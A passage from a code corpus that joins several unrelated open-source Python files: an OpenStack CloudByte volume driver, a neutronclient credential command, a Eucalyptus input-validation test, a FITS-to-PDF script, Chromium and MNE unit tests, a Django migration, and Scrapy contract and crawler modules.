data = self._api_request_for_cloudbyte("listAccount", params)
accounts = data["listAccountResponse"]["account"]
account_id = None
for account in accounts:
if account.get("name") == account_name:
account_id = account.get("id")
break
if account_id is None:
msg = _("Failed to get CloudByte account details "
"for account [%s].") % account_name
raise exception.VolumeBackendAPIException(data=msg)
return account_id
def _search_volume_id(self, cb_volumes, cb_volume_id):
"""Search the volume in CloudByte."""
volumes_res = cb_volumes.get('listFilesystemResponse')
if volumes_res is None:
msg = _("No response was received from CloudByte's "
"list filesystem api call.")
raise exception.VolumeBackendAPIException(data=msg)
volumes = volumes_res.get('filesystem')
if volumes is None:
msg = _("No volume was found at CloudByte storage.")
raise exception.VolumeBackendAPIException(data=msg)
volume_id = None
for vol in volumes:
if vol['id'] == cb_volume_id:
volume_id = vol['id']
break
return volume_id
def _get_storage_info(self, tsmname):
"""Get CloudByte TSM that is associated with OpenStack backend."""
# List all TSMs from CloudByte storage
tsm_list = self._api_request_for_cloudbyte('listTsm', params={})
tsm_details_res = tsm_list.get('listTsmResponse')
if tsm_details_res is None:
msg = _("No response was received from CloudByte storage "
"list tsm API call.")
raise exception.VolumeBackendAPIException(data=msg)
tsm_details = tsm_details_res.get('listTsm')
data = {}
flag = 0
# Filter required TSM and get storage info
for tsms in tsm_details:
if tsms['name'] == tsmname:
flag = 1
data['total_capacity_gb'] = (
float(tsms['numericquota']) / units.Ki)
data['free_capacity_gb'] = (
float(tsms['availablequota']) / units.Ki)
break
# TSM not found in CloudByte storage
if flag == 0:
LOG.error(_LE("TSM [%s] not found in CloudByte storage."), tsmname)
data['total_capacity_gb'] = 0.0
data['free_capacity_gb'] = 0.0
return data
def _get_auth_group_id_from_response(self, data):
"""Find iSCSI auth group id."""
chap_group = self.configuration.cb_auth_group
ag_list_res = data.get('listiSCSIAuthGroupResponse')
if ag_list_res is None:
msg = _("Null response received from CloudByte's "
"list iscsi auth groups.")
raise exception.VolumeBackendAPIException(data=msg)
ag_list = ag_list_res.get('authgroup')
if ag_list is None:
msg = _('No iscsi auth groups were found in CloudByte.')
raise exception.VolumeBackendAPIException(data=msg)
ag_id = None
for ag in ag_list:
if ag.get('name') == chap_group:
ag_id = ag['id']
break
else:
msg = _("Auth group [%s] details not found in "
"CloudByte storage.") % chap_group
raise exception.VolumeBackendAPIException(data=msg)
return ag_id
def _get_auth_group_info(self, account_id, ag_id):
"""Fetch the auth group details."""
params = {"accountid": account_id, "authgroupid": ag_id}
auth_users = self._api_request_for_cloudbyte(
'listiSCSIAuthUser', params)
auth_user_details_res = auth_users.get('listiSCSIAuthUsersResponse')
if auth_user_details_res is None:
msg = _("No response was received from CloudByte storage "
"list iSCSI auth user API call.")
raise exception.VolumeBackendAPIException(data=msg)
auth_user_details = auth_user_details_res.get('authuser')
if auth_user_details is None:
msg = _("Auth user details not found in CloudByte storage.")
raise exception.VolumeBackendAPIException(data=msg)
chapuser = auth_user_details[0].get('chapusername')
chappassword = auth_user_details[0].get('chappassword')
if chapuser is None or chappassword is None:
msg = _("Invalid chap user details found in CloudByte storage.")
raise exception.VolumeBackendAPIException(data=msg)
data = {'username': chapuser, 'password': chappassword, 'ag_id': ag_id}
return data
def _get_chap_info(self, account_id):
"""Fetch the chap details."""
params = {"accountid": account_id}
iscsi_auth_data = self._api_request_for_cloudbyte(
'listiSCSIAuthGroup', params)
ag_id = self._get_auth_group_id_from_response(
iscsi_auth_data)
return self._get_auth_group_info(account_id, ag_id)
def _export(self):
model_update = {'provider_auth': None}
if self.cb_use_chap is True:
account_name = self.configuration.cb_account_name
account_id = self._get_account_id_from_name(account_name)
chap = self._get_chap_info(account_id)
model_update['provider_auth'] = ('CHAP %(username)s %(password)s'
% chap)
return model_update
def create_volume(self, volume):
tsm_name = self.configuration.cb_tsm_name
account_name = self.configuration.cb_account_name
# Get account id of this account
account_id = self._get_account_id_from_name(account_name)
# Set backend storage volume name using OpenStack volume id
cb_volume_name = volume['id'].replace("-", "")
LOG.debug("Will create a volume [%(cb_vol)s] in TSM [%(tsm)s] "
"at CloudByte storage w.r.t "
"OpenStack volume [%(stack_vol)s].",
{'cb_vol': cb_volume_name,
'stack_vol': volume.get('id'),
'tsm': tsm_name})
tsm_data = self._request_tsm_details(account_id)
tsm_details = self._get_tsm_details(tsm_data, tsm_name, account_name)
# Send request to create a qos group before creating a volume
LOG.debug("Creating qos group for CloudByte volume [%s].",
cb_volume_name)
qos_data = self._add_qos_group_request(
volume, tsm_details.get('tsmid'), cb_volume_name)
# Extract the qos group id from response
qosgroupid = qos_data['addqosgroupresponse']['qosgroup']['id']
LOG.debug("Successfully created qos group for CloudByte volume [%s].",
cb_volume_name)
# Send a create volume request to CloudByte API
vol_data = self._create_volume_request(
volume, tsm_details.get('datasetid'), qosgroupid,
tsm_details.get('tsmid'), cb_volume_name)
# Since create volume is an async call;
# need to confirm the creation before proceeding further
self._wait_for_volume_creation(vol_data, cb_volume_name)
# Fetch iscsi id
cb_volumes = self._api_request_for_cloudbyte(
'listFileSystem', params={})
volume_id = self._get_volume_id_from_response(cb_volumes,
cb_volume_name)
params = {"storageid": volume_id}
iscsi_service_data = self._api_request_for_cloudbyte(
'listVolumeiSCSIService', params)
iscsi_id = self._get_iscsi_service_id_from_response(
volume_id, iscsi_service_data)
# Fetch the initiator group ID
params = {"accountid": account_id}
iscsi_initiator_data = self._api_request_for_cloudbyte(
'listiSCSIInitiator', params)
ig_id = self._get_initiator_group_id_from_response(
iscsi_initiator_data)
LOG.debug("Updating iscsi service for CloudByte volume [%s].",
cb_volume_name)
ag_id = None
chap_info = {}
if self.cb_use_chap is True:
chap_info = self._get_chap_info(account_id)
ag_id = chap_info['ag_id']
# Update the iscsi service with above fetched iscsi_id & ig_id
self._request_update_iscsi_service(iscsi_id, ig_id, ag_id)
LOG.debug("CloudByte volume [%(vol)s] updated with "
"iscsi id [%(iscsi)s] and initiator group [%(ig)s] and "
"authentication group [%(ag)s].",
{'vol': cb_volume_name, 'iscsi': iscsi_id,
'ig': ig_id, 'ag': ag_id})
# Provide the model after successful completion of above steps
provider = self._build_provider_details_from_response(
cb_volumes, cb_volume_name, chap_info)
LOG.info(_LI("Successfully created a CloudByte volume [%(cb_vol)s] "
"w.r.t OpenStack volume [%(stack_vol)s]."),
{'cb_vol': cb_volume_name, 'stack_vol': volume.get('id')})
return provider
def delete_volume(self, volume):
params = {}
# OpenStack source volume id
source_volume_id = volume['id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = volume.get('provider_id')
LOG.debug("Will delete CloudByte volume [%(cb_vol)s] "
"w.r.t OpenStack volume [%(stack_vol)s].",
{'cb_vol': cb_volume_id, 'stack_vol': source_volume_id})
# Delete volume at CloudByte
if cb_volume_id is not None:
cb_volumes = self._api_request_for_cloudbyte(
'listFileSystem', params)
# Search cb_volume_id in CloudByte volumes
# incase it has already been deleted from CloudByte
cb_volume_id = self._search_volume_id(cb_volumes, cb_volume_id)
# Delete volume at CloudByte
if cb_volume_id is not None:
params = {"id": cb_volume_id}
del_res = self._api_request_for_cloudbyte('deleteFileSystem',
params)
self._wait_for_volume_deletion(del_res, cb_volume_id)
LOG.info(
_LI("Successfully deleted volume [%(cb_vol)s] "
"at CloudByte corresponding to "
"OpenStack volume [%(stack_vol)s]."),
{'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
else:
LOG.error(_LE("CloudByte does not have a volume corresponding "
"to OpenStack volume [%s]."), source_volume_id)
else:
LOG.error(_LE("CloudByte volume information not available for"
" OpenStack volume [%s]."), source_volume_id)
def create_snapshot(self, snapshot):
"""Creates a snapshot at CloudByte."""
# OpenStack volume
source_volume_id = snapshot['volume_id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
if cb_volume_id is not None:
# Set backend storage snapshot name using OpenStack snapshot id
snapshot_name = "snap_" + snapshot['id'].replace("-", "")
params = {
"name": snapshot_name,
"id": cb_volume_id
}
LOG.debug(
"Will create CloudByte snapshot [%(cb_snap)s] "
"w.r.t CloudByte volume [%(cb_vol)s] "
"and OpenStack volume [%(stack_vol)s].",
{'cb_snap': snapshot_name,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
self._api_request_for_cloudbyte('createStorageSnapshot', params)
# Get the snapshot path from CloudByte
path = self._get_cb_snapshot_path(snapshot_name, cb_volume_id)
LOG.info(
_LI("Created CloudByte snapshot [%(cb_snap)s] "
"w.r.t CloudByte volume [%(cb_vol)s] "
"and OpenStack volume [%(stack_vol)s]."),
{'cb_snap': path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
model_update = {}
# Store snapshot path as snapshot provider_id
model_update['provider_id'] = path
else:
msg = _("Failed to create snapshot. CloudByte volume information "
"not found for OpenStack volume [%s].") % source_volume_id
raise exception.VolumeBackendAPIException(data=msg)
return model_update
def create_cloned_volume(self, cloned_volume, src_volume):
"""Create a clone of an existing volume.
First it will create a snapshot of the source/parent volume,
then it creates a clone of this newly created snapshot.
"""
# Extract necessary information from input params
parent_volume_id = src_volume.get('id')
# Generating id for snapshot
# as this is not user entered in this particular usecase
snapshot_id = six.text_type(uuid.uuid1())
# Prepare the params for create_snapshot
# as well as create_volume_from_snapshot method
snapshot_params = {
'id': snapshot_id,
'volume_id': parent_volume_id,
'volume': src_volume,
}
# Create a snapshot
snapshot = self.create_snapshot(snapshot_params)
snapshot_params['provider_id'] = snapshot.get('provider_id')
# Create a clone of above snapshot
return self.create_volume_from_snapshot(cloned_volume, snapshot_params)
def create_volume_from_snapshot(self, cloned_volume, snapshot):
"""Create a clone from an existing snapshot."""
# Getting necessary data from input params
parent_volume_id = snapshot['volume_id']
cloned_volume_name = cloned_volume['id'].replace("-", "")
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
# CloudByte snapshot path equals OpenStack snapshot's provider_id
cb_snapshot_path = snapshot['provider_id']
params = {
"id": cb_volume_id,
"clonename": cloned_volume_name,
"path": cb_snapshot_path
}
LOG.debug(
"Will create CloudByte clone [%(cb_clone)s] "
"at CloudByte snapshot path [%(cb_snap)s] "
"w.r.t parent OpenStack volume [%(stack_vol)s].",
{'cb_clone': cloned_volume_name,
'cb_snap': cb_snapshot_path,
'stack_vol': parent_volume_id})
# Create clone of the snapshot
clone_dataset_snapshot_res = (
self._api_request_for_cloudbyte('cloneDatasetSnapshot', params))
cb_snap = clone_dataset_snapshot_res.get('cloneDatasetSnapshot')
cb_vol = {}
if cb_snap is not None:
cb_vol = cb_snap.get('filesystem')
else:
msg = ("Error: Clone creation failed for "
"OpenStack volume [%(vol)s] with CloudByte "
"snapshot path [%(path)s]" %
{'vol': parent_volume_id, 'path': cb_snapshot_path})
raise exception.VolumeBackendAPIException(data=msg)
LOG.info(
_LI("Created a clone [%(cb_clone)s] "
"at CloudByte snapshot path [%(cb_snap)s] "
"w.r.t parent OpenStack volume [%(stack_vol)s]."),
{'cb_clone': cloned_volume_name,
'cb_snap': cb_snapshot_path,
'stack_vol': parent_volume_id})
chap_info = {}
if self.cb_use_chap is True:
account_name = self.configuration.cb_account_name
# Get account id of this account
account_id = self._get_account_id_from_name(account_name)
chap_info = self._get_chap_info(account_id)
model_update = self._build_provider_details_from_volume(cb_vol,
chap_info)
return model_update
def delete_snapshot(self, snapshot):
"""Delete a snapshot at CloudByte."""
# Find volume id
source_volume_id = snapshot['volume_id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
# CloudByte snapshot path equals OpenStack snapshot's provider_id
cb_snapshot_path = snapshot['provider_id']
# If cb_snapshot_path is 'None'
# then no need to execute CloudByte API
if cb_snapshot_path is not None:
params = {
"id": cb_volume_id,
"path": cb_snapshot_path
}
LOG.debug("Will delete CloudByte snapshot [%(snap)s] w.r.t "
"parent CloudByte volume [%(cb_vol)s] "
"and parent OpenStack volume [%(stack_vol)s].",
{'snap': cb_snapshot_path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
# Execute CloudByte API
self._api_request_for_cloudbyte('deleteSnapshot', params)
LOG.info(
_LI("Deleted CloudByte snapshot [%(snap)s] w.r.t "
"parent CloudByte volume [%(cb_vol)s] "
"and parent OpenStack volume [%(stack_vol)s]."),
{'snap': cb_snapshot_path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
else:
LOG.error(_LE("CloudByte snapshot information is not available"
" for OpenStack volume [%s]."), source_volume_id)
def extend_volume(self, volume, new_size):
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = volume.get('provider_id')
params = {
"id": cb_volume_id,
"quotasize": six.text_type(new_size) + 'G'
}
# Request the CloudByte api to update the volume
self._api_request_for_cloudbyte('updateFileSystem', params)
def create_export(self, context, volume, connector):
"""Setup the iscsi export info."""
return self._export()
def ensure_export(self, context, volume):
"""Verify the iscsi export info."""
return self._export()
def get_volume_stats(self, refresh=False):
"""Get volume statistics.
If 'refresh' is True, update/refresh the statistics first.
"""
if refresh:
# Get the TSM name from configuration
tsm_name = self.configuration.cb_tsm_name
# Get the storage details of this TSM
data = self._get_storage_info(tsm_name)
data["volume_backend_name"] = (
self.configuration.safe_get('volume_backend_name') or
'CloudByte')
data["vendor_name"] = 'CloudByte'
data['reserved_percentage'] = 0
data["driver_version"] = CloudByteISCSIDriver.VERSION
data["storage_protocol"] = 'iSCSI'
LOG.debug("CloudByte driver stats: [%s].", data)
# Set this to the instance variable
self.volume_stats = data
return self.volume_stats
| nikesh-mahalka/cinder | cinder/volume/drivers/cloudbyte/cloudbyte.py | Python | apache-2.0 | 38,259 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import logging
from neutronclient.neutron import v2_0 as neutronV20
class ListCredential(neutronV20.ListCommand):
"""List credentials that belong to a given tenant."""
resource = 'credential'
log = logging.getLogger(__name__ + '.ListCredential')
_formatters = {}
list_columns = ['credential_id', 'credential_name', 'user_name',
'password', 'type']
class ShowCredential(neutronV20.ShowCommand):
"""Show information of a given credential."""
resource = 'credential'
log = logging.getLogger(__name__ + '.ShowCredential')
allow_names = False
class CreateCredential(neutronV20.CreateCommand):
"""Creates a credential."""
resource = 'credential'
log = logging.getLogger(__name__ + '.CreateCredential')
def add_known_arguments(self, parser):
parser.add_argument(
'credential_name',
help='Name/Ip address for Credential')
parser.add_argument(
'credential_type',
help='Type of the Credential')
parser.add_argument(
'--username',
help='Username for the credential')
parser.add_argument(
'--password',
help='Password for the credential')
def args2body(self, parsed_args):
body = {'credential': {
'credential_name': parsed_args.credential_name}}
if parsed_args.credential_type:
body['credential'].update({'type':
parsed_args.credential_type})
if parsed_args.username:
body['credential'].update({'user_name':
parsed_args.username})
if parsed_args.password:
body['credential'].update({'password':
parsed_args.password})
return body
class DeleteCredential(neutronV20.DeleteCommand):
"""Delete a given credential."""
log = logging.getLogger(__name__ + '.DeleteCredential')
resource = 'credential'
allow_names = False
| vichoward/python-neutronclient | neutronclient/neutron/v2_0/credential.py | Python | apache-2.0 | 2,705 |
'''
Created on = '10/1/13'
Author = 'mmunn'
Unit test : EUCA-7710 missing input validation on CLC
setUp : Install Credentials, starts instance
test : run euca-bundle-instance, euca-attach-volume and euca-dettach-volume with bad input parameters
for bucket,prefix and device
tearDown : Removes Credentials, terminates instance
cloud.conf:( place in same directory as this test)
IP ADDRESS CENTOS 6.3 64 BZR [CC00 CLC SC00 WS]
IP ADDRESS CENTOS 6.3 64 BZR [NC00]
'''
import unittest
import shutil
from eucaops import Eucaops
class Euca7710(unittest.TestCase):
def setUp(self):
self.OK = '\033[1m\033[37m\033[42m'
self.ENDC = '\033[0m'
self.conf = 'cloud.conf'
self.tester = Eucaops( config_file=self.conf, password='foobar' )
self.source = 'source ' + self.tester.credpath + '/eucarc && '
self.clc1 = self.tester.service_manager.get_enabled_clc()
self.doAuth()
def doAuth(self):
self.keypair = self.tester.add_keypair()
self.group = self.tester.add_group()
self.tester.authorize_group(self.group)
self.tester.authorize_group(self.group, port=3389, protocol='tcp')
self.skey = self.tester.get_secret_key()
self.akey = self.tester.get_access_key()
def runInstances(self, numMax):
#Start instance
self.reservation = self.tester.run_instance(self.emi,type='m1.large', keypair=self.keypair.name, group=self.group, min=1, max=numMax, is_reachable=False)
# Make sure the instance is running
for instance in self.reservation.instances:
if instance.state == 'running':
self.instance = instance
self.instanceid = instance.id
def runCmdTest (self, cmd):
self.out = self.clc1.machine.cmd(self.source + self.cmd)
print self.OK + self.out['output'] + self.ENDC
# make sure InvalidParameterValue error was thrown
assert str(self.out).count('InvalidParameterValue') > 0
def test(self):
self.emi = self.tester.get_emi()
self.runInstances(1)
# Attempt to bundle the running instance with invalid parameters
# regex used to validate bucket and prefix parameters = ( ^[a-zA-Z\d\.\-_]{3,255}$ )
# two few chars
self.badBucket = 'xx'
# invalid char
self.badPrefix = 'xx$'
self.cmd = 'euca-bundle-instance ' + self.instanceid + ' -b ' + self.badBucket + ' -p goodPrefix -o ' + self.akey + ' -w ' + self.skey
self.runCmdTest(self.cmd)
self.cmd = 'euca-bundle-instance ' + self.instanceid + ' -b goodBucket -p ' + self.badPrefix + ' -o ' + self.akey + ' -w ' + self.skey
self.runCmdTest(self.cmd)
# Attempt to attach and detach volume with invalid device name
# regex used to device parameter = ( ^[a-zA-Z\d/]{3,10}$ )
self.volume = 'vol-BOGUS1'
# invalid char
self.badDevice1 = 'sd$'
# invalid name too long
self.badDevice2 = 'sdistoolong'
self.cmd = 'euca-attach-volume -i ' + self.instanceid + ' -d ' + self.badDevice1 + ' ' + self.volume
self.runCmdTest(self.cmd)
self.cmd = 'euca-attach-volume -i ' + self.instanceid + ' -d ' + self.badDevice1 + ' ' + self.volume
self.runCmdTest(self.cmd)
self.cmd = 'euca-detach-volume -i ' + self.instanceid + ' -d ' + self.badDevice1 + ' ' + self.volume
self.runCmdTest(self.cmd)
self.cmd = 'euca-detach-volume -i ' + self.instanceid + ' -d ' + self.badDevice1 + ' ' + self.volume
self.runCmdTest(self.cmd)
def tearDown(self):
if self.reservation is not None:
self.tester.terminate_instances(self.reservation)
self.tester.delete_keypair(self.keypair)
self.tester.local('rm ' + self.keypair.name + '.pem')
shutil.rmtree(self.tester.credpath)
if __name__ == '__main__':
unittest.main() | nagyistoce/eutester | testcases/cloud_admin/3-4/Euca7710.py | Python | bsd-2-clause | 4,008 |
#! /usr/bin/env python
#
# fits2pdf.py -- Image a FITS file as a PDF.
#
# Eric Jeschke ([email protected])
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
"""
$ ./fits2pdf.py <fitsfile> <output.pdf>
"""
import sys, os
import logging
from ginga.cairow.ImageViewCairo import ImageViewCairo
import cairo
from ginga import AstroImage
STD_FORMAT = '%(asctime)s | %(levelname)1.1s | %(filename)s:%(lineno)d (%(funcName)s) | %(message)s'
point_in = 1/72.0
point_cm = 0.0352777778
def main(options, args):
logger = logging.getLogger("example1")
logger.setLevel(logging.INFO)
fmt = logging.Formatter(STD_FORMAT)
stderrHdlr = logging.StreamHandler()
stderrHdlr.setFormatter(fmt)
logger.addHandler(stderrHdlr)
fi = ImageViewCairo(logger)
fi.configure(500, 1000)
# Load fits file
filepath = args[0]
image = AstroImage.AstroImage(logger=logger)
image.load_file(filepath)
# Make any adjustments to the image that we want
fi.set_bg(1.0, 1.0, 1.0)
fi.set_image(image)
fi.auto_levels()
fi.zoom_fit()
fi.center_image()
ht_pts = 11.0 / point_in
wd_pts = 8.5 / point_in
off_x, off_y = 0, 0
outfilepath = args[1]
out_f = open(outfilepath, 'w')
surface = cairo.PDFSurface(out_f, wd_pts, ht_pts)
# set pixels per inch
surface.set_fallback_resolution(300, 300)
surface.set_device_offset(off_x, off_y)
try:
fi.save_image_as_surface(surface)
surface.show_page()
surface.flush()
surface.finish()
finally:
out_f.close()
if __name__ == '__main__':
main(None, sys.argv[1:])
# END
| rajul/ginga | scripts/fits2pdf.py | Python | bsd-3-clause | 1,754 |
#!/usr/bin/env vpython3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from blinkpy.web_tests.stale_expectation_removal import builders
from unexpected_passes_common import constants
from unexpected_passes_common import data_types
class BuilderRunsTestOfInterestUnittest(unittest.TestCase):
def setUp(self):
self.instance = builders.WebTestBuilders(False)
def testMatch(self):
"""Tests that a match can be successfully found."""
test_map = {
'isolated_scripts': [
{
'isolate_name': 'blink_web_tests',
},
],
}
self.assertTrue(
self.instance._BuilderRunsTestOfInterest(test_map, None))
# Re-add once WebGPU tests are supported.
# test_map = {
# 'isolated_scripts': [
# {
# 'isolate_name': 'webgpu_blink_web_tests',
# },
# ],
# }
# self.assertTrue(
# self.instance._BuilderRunsTestOfInterest(test_map, None))
def testNoMatch(self):
test_map = {
'isolated_scripts': [
{
'isolate_name': 'foo_web_tests',
},
],
}
self.assertFalse(
self.instance._BuilderRunsTestOfInterest(test_map, None))
class GetFakeCiBuildersUnittest(unittest.TestCase):
def testStringsConvertedToBuilderEntries(self):
"""Tests that the easier-to-read strings get converted to BuilderEntry."""
instance = builders.WebTestBuilders(False)
fake_builders = instance.GetFakeCiBuilders()
ci_builder = data_types.BuilderEntry('linux-blink-rel-dummy',
constants.BuilderTypes.CI, False)
expected_try = set([
data_types.BuilderEntry('linux-blink-rel',
constants.BuilderTypes.TRY, False),
data_types.BuilderEntry('v8_linux_blink_rel',
constants.BuilderTypes.TRY, False)
])
self.assertEqual(fake_builders[ci_builder], expected_try)
class GetNonChromiumBuildersUnittest(unittest.TestCase):
def testStringsConvertedToBuilderEntries(self):
"""Tests that the easier-to-read strings get converted to BuilderEntry."""
instance = builders.WebTestBuilders(False)
builder = data_types.BuilderEntry('ToTMacOfficial',
constants.BuilderTypes.CI, False)
self.assertIn(builder, instance.GetNonChromiumBuilders())
if __name__ == '__main__':
unittest.main(verbosity=2)
| chromium/chromium | third_party/blink/tools/blinkpy/web_tests/stale_expectation_removal/builders_unittest.py | Python | bsd-3-clause | 2,804 |
# Generated by Django 2.2.6 on 2019-11-05 16:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('scanners', '0013_auto_20191105_1522'),
]
operations = [
migrations.AlterField(
model_name='scannerrule',
name='action',
field=models.PositiveSmallIntegerField(choices=[(1, 'No action'), (20, 'Flag for human review'), (100, 'Delay auto-approval'), (200, 'Delay auto-approval indefinitely')], default=1),
),
]
| eviljeff/olympia | src/olympia/scanners/migrations/0014_alter_action_choices_on_scannerrule.py | Python | bsd-3-clause | 536 |
# Generic tests that all raw classes should run
from os import path as op
from numpy.testing import assert_allclose
from mne.datasets import testing
from mne.io import Raw
def _test_concat(reader, *args):
"""Test concatenation of raw classes that allow not preloading"""
data = None
for preload in (True, False):
raw1 = reader(*args, preload=preload)
raw2 = reader(*args, preload=preload)
raw1.append(raw2)
raw1.preload_data()
if data is None:
data = raw1[:, :][0]
assert_allclose(data, raw1[:, :][0])
for first_preload in (True, False):
raw = reader(*args, preload=first_preload)
data = raw[:, :][0]
for preloads in ((True, True), (True, False), (False, False)):
for last_preload in (True, False):
print(first_preload, preloads, last_preload)
raw1 = raw.crop(0, 0.4999)
if preloads[0]:
raw1.preload_data()
raw2 = raw.crop(0.5, None)
if preloads[1]:
raw2.preload_data()
raw1.append(raw2)
if last_preload:
raw1.preload_data()
assert_allclose(data, raw1[:, :][0])
@testing.requires_testing_data
def test_time_index():
"""Test indexing of raw times"""
raw_fname = op.join(op.dirname(__file__), '..', '..', 'io', 'tests',
'data', 'test_raw.fif')
raw = Raw(raw_fname)
# Test original (non-rounding) indexing behavior
orig_inds = raw.time_as_index(raw.times)
assert(len(set(orig_inds)) != len(orig_inds))
# Test new (rounding) indexing behavior
new_inds = raw.time_as_index(raw.times, use_rounding=True)
assert(len(set(new_inds)) == len(new_inds))
| trachelr/mne-python | mne/io/tests/test_raw.py | Python | bsd-3-clause | 1,809 |
import sys
import re
from functools import wraps
from unittest import TestCase
from scrapy.http import Request
from scrapy.utils.spider import iterate_spider_output
from scrapy.utils.python import get_spec
class ContractsManager(object):
contracts = {}
def __init__(self, contracts):
for contract in contracts:
self.contracts[contract.name] = contract
def extract_contracts(self, method):
contracts = []
for line in method.__doc__.split('\n'):
line = line.strip()
if line.startswith('@'):
name, args = re.match(r'@(\w+)\s*(.*)', line).groups()
args = re.split(r'\s+', args)
contracts.append(self.contracts[name](method, *args))
return contracts
def from_method(self, method, results):
contracts = self.extract_contracts(method)
if contracts:
# calculate request args
args, kwargs = get_spec(Request.__init__)
kwargs['callback'] = method
for contract in contracts:
kwargs = contract.adjust_request_args(kwargs)
# create and prepare request
args.remove('self')
if set(args).issubset(set(kwargs)):
request = Request(**kwargs)
# execute pre and post hooks in order
for contract in reversed(contracts):
request = contract.add_pre_hook(request, results)
for contract in contracts:
request = contract.add_post_hook(request, results)
return request
class Contract(object):
""" Abstract class for contracts """
def __init__(self, method, *args):
self.testcase_pre = self.create_testcase(method, 'pre-hook')
self.testcase_post = self.create_testcase(method, 'post-hook')
self.args = args
def create_testcase(self, method, hook):
spider = method.__self__.name
class ContractTestCase(TestCase):
def __str__(_self):
return "[%s] %s (@%s %s)" % (spider, method.__name__, self.name, hook)
name = '%s_%s' % (spider, method.__name__)
setattr(ContractTestCase, name, lambda x: x)
return ContractTestCase(name)
def add_pre_hook(self, request, results):
if hasattr(self, 'pre_process'):
cb = request.callback
@wraps(cb)
def wrapper(response):
try:
results.startTest(self.testcase_pre)
self.pre_process(response)
results.stopTest(self.testcase_pre)
except AssertionError:
results.addFailure(self.testcase_pre, sys.exc_info())
except Exception:
results.addError(self.testcase_pre, sys.exc_info())
else:
results.addSuccess(self.testcase_pre)
finally:
return list(iterate_spider_output(cb(response)))
request.callback = wrapper
return request
def add_post_hook(self, request, results):
if hasattr(self, 'post_process'):
cb = request.callback
@wraps(cb)
def wrapper(response):
try:
output = list(iterate_spider_output(cb(response)))
results.startTest(self.testcase_post)
self.post_process(output)
results.stopTest(self.testcase_post)
except AssertionError:
results.addFailure(self.testcase_post, sys.exc_info())
except Exception:
results.addError(self.testcase_post, sys.exc_info())
else:
results.addSuccess(self.testcase_post)
finally:
return output
request.callback = wrapper
return request
def adjust_request_args(self, args):
return args
| 1900/scrapy | scrapy/contracts/__init__.py | Python | bsd-3-clause | 4,024 |
import six
import signal
import logging
import warnings
from twisted.internet import reactor, defer
from zope.interface.verify import verifyClass, DoesNotImplement
from scrapy.core.engine import ExecutionEngine
from scrapy.resolver import CachingThreadedResolver
from scrapy.interfaces import ISpiderLoader
from scrapy.extension import ExtensionManager
from scrapy.settings import Settings
from scrapy.signalmanager import SignalManager
from scrapy.exceptions import ScrapyDeprecationWarning
from scrapy.utils.ossignal import install_shutdown_handlers, signal_names
from scrapy.utils.misc import load_object
from scrapy.utils.log import LogCounterHandler, configure_logging, log_scrapy_info
from scrapy import signals
logger = logging.getLogger(__name__)
class Crawler(object):
def __init__(self, spidercls, settings=None):
if isinstance(settings, dict) or settings is None:
settings = Settings(settings)
self.spidercls = spidercls
self.settings = settings.copy()
self.spidercls.update_settings(self.settings)
self.signals = SignalManager(self)
self.stats = load_object(self.settings['STATS_CLASS'])(self)
handler = LogCounterHandler(self, level=settings.get('LOG_LEVEL'))
logging.root.addHandler(handler)
# lambda is assigned to Crawler attribute because this way it is not
# garbage collected after leaving __init__ scope
self.__remove_handler = lambda: logging.root.removeHandler(handler)
self.signals.connect(self.__remove_handler, signals.engine_stopped)
lf_cls = load_object(self.settings['LOG_FORMATTER'])
self.logformatter = lf_cls.from_crawler(self)
self.extensions = ExtensionManager.from_crawler(self)
self.settings.freeze()
self.crawling = False
self.spider = None
self.engine = None
@property
def spiders(self):
if not hasattr(self, '_spiders'):
warnings.warn("Crawler.spiders is deprecated, use "
"CrawlerRunner.spider_loader or instantiate "
"scrapy.spiderloader.SpiderLoader with your "
"settings.",
category=ScrapyDeprecationWarning, stacklevel=2)
self._spiders = _get_spider_loader(self.settings.frozencopy())
return self._spiders
@defer.inlineCallbacks
def crawl(self, *args, **kwargs):
assert not self.crawling, "Crawling already taking place"
self.crawling = True
try:
self.spider = self._create_spider(*args, **kwargs)
self.engine = self._create_engine()
start_requests = iter(self.spider.start_requests())
yield self.engine.open_spider(self.spider, start_requests)
yield defer.maybeDeferred(self.engine.start)
except Exception:
self.crawling = False
raise
def _create_spider(self, *args, **kwargs):
return self.spidercls.from_crawler(self, *args, **kwargs)
def _create_engine(self):
return ExecutionEngine(self, lambda _: self.stop())
@defer.inlineCallbacks
def stop(self):
if self.crawling:
self.crawling = False
yield defer.maybeDeferred(self.engine.stop)
class CrawlerRunner(object):
"""
This is a convenient helper class that keeps track of, manages and runs
crawlers inside an already setup Twisted `reactor`_.
The CrawlerRunner object must be instantiated with a
:class:`~scrapy.settings.Settings` object.
This class shouldn't be needed (since Scrapy is responsible of using it
accordingly) unless writing scripts that manually handle the crawling
process. See :ref:`run-from-script` for an example.
"""
crawlers = property(
lambda self: self._crawlers,
doc="Set of :class:`crawlers <scrapy.crawler.Crawler>` started by "
":meth:`crawl` and managed by this class."
)
def __init__(self, settings=None):
if isinstance(settings, dict) or settings is None:
settings = Settings(settings)
self.settings = settings
self.spider_loader = _get_spider_loader(settings)
